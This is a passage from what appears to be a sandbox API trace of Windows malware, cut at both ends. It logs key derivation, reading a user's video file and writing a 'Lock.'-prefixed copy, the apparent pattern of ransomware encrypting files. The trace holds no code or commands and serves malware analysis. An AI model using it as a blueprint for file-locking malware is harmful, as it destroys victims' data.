lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab458, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.295] CryptDeriveKey (in: hProv=0xa7c220, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0212.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.295] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.300] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.300] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0212.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0212.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0212.301] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0212.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/CBK9.flv" (normalized: "c:\\users\\fd1hvy\\videos\\cbk9.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0212.302] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.302] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0212.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0212.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0212.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74f98 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.303] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74f98 | out: hHeap=0x2af0000) returned 1 [0212.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0212.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.CBK9.flv" (normalized: "c:\\users\\fd1hvy\\videos\\lock.cbk9.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0212.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f80 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0212.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0212.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0212.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0212.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.306] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0212.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e2020 [0212.316] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0212.316] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x4673, lpOverlapped=0x0) returned 1 [0212.318] ReadFile (in: hFile=0x504, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0212.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4673) returned 0x3867020 [0212.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e2020 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4673) returned 0x2a8a138 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0212.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4673) returned 0x3867020 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0212.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0212.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0212.324] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0212.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4673) returned 0x3867020 [0212.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0212.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722c8 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0212.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab158 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0212.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4673) returned 0x2a8e7b8 [0212.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0212.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0212.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0212.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.326] RtlAllocateHeap (HeapHandle=0x2af0000, 